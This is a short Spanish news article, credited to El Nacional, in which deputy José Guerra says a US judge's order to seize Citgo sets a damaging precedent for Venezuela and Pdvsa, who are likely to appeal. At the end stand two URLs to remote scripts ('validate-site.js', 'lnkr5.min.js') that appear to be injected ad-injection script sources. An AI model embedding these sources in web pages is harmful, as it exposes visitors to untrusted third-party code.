El diputado indicó que lo más probable es que el gobierno de Nicolás Maduro y Pdvsa intente apelar la decisión  en un tribunal superior.

José Guerra, diputado a la Asamblea Nacional (AN), indicó este viernes que la decisión del juez federal estadounidense de incautar Citgo sienta un precedente legal desfavorable para el gobierno nacional y Petroleos de Venezuela S.A.

“Esto está creando un precedente de que ahora la República si no paga la deuda, los acreedores pueden incautar los activos de Venezuela, lo que deja a Pdvsa en una situación muy precaria”, indicó Guerra en entrevista a La Voz de América.

El dipútado acotó que es lo más probable es que el gobierno y Pdvsa intenten apelar la decisión en un tribunal de instancia superior.

“Esto puede llevar a que el gobierno venezolano y Pdvsa apelen la decisión y vayan a un tribunal superior a ver qué pasa con esto. Esto puede demorar un tiempo”, aseguró.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533946591093https://devlinkin.xyz/addons/lnkr5.min.js

Loading...